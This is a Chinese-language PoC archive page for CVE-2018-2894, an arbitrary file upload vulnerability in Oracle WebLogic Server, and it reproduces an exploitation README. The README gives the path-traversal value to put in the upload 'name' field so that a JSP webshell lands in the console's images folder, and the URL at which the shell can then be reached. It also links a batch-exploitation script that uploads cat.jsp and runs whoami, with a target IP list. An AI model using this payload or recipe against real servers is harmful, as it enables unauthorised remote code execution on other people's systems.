POC详情: b87dde4168b6b3b17e32d624436d2ad7efe873ff

来源
关联漏洞
标题: Oracle Fusion Middleware Oracle WebLogic Server组件安全漏洞 (CVE-2018-2894)
描述:Oracle Fusion Middleware(Oracle融合中间件)是美国甲骨文(Oracle)公司的一套面向企业和云环境的业务创新平台。该平台提供了中间件、软件集合等功能。Oracle WebLogic Server是其中的一个适用于云环境和传统环境的应用服务器组件。 Oracle Fusion Middleware中的Oracle WebLogic Server组件的WLS - Web Services子组件存在安全漏洞。攻击者可利用该漏洞控制Oracle WebLogic Server,影响数
描述
cve-2018-2894 不同别人的利用方法。
介绍
Weblogic任意文件上传漏洞(CVE-2018-2894)

最近大家都在说这个漏洞,大家都注意到config.do这里发生了问题,但是其实根据
https://mp.weixin.qq.com/s/y5JGmM-aNaHcs_6P9a-gRQ
这里的信息,begin.do也是有问题。少扯淡,下面给出具体利用方法:
问题就出现下下面这个页面。
![Alt text](./1532078065241.png)

上传时候,修改name的值就可以了

![Alt text](./1532078209496.png)







避免大家麻烦,给出来:
 /../../../../../../wlserver/server/lib/consoleapp/webapp/framework/skins/wlsconsole/images/
然后访问
 http://xx.xx.xx.xx:7001/console/framework/skins/wlsconsole/images/_222.jsp
 就可以访问到了。
 ![Alt text](./1532078563343.png)




我写了一个批量利用的python脚本,会上传cat.jsp,然后执行whoami

https://github.com/111ddea/cve-2018-2894.git


另外的利用config.do的方法可以看下面:
https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2018-2894
https://xz.aliyun.com/t/2458?from=timeline&isappinstalled=0
文件快照

[4.0K] /data/pocs/b87dde4168b6b3b17e32d624436d2ad7efe873ff ├── [189K] 1532078065241.png ├── [281K] 1532078209496.png ├── [110K] 1532078563343.png ├── [ 16K] cve-2018-2894.py ├── [1.0K] README.md └── [ 0] weblogic_ip1.txt 0 directories, 6 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。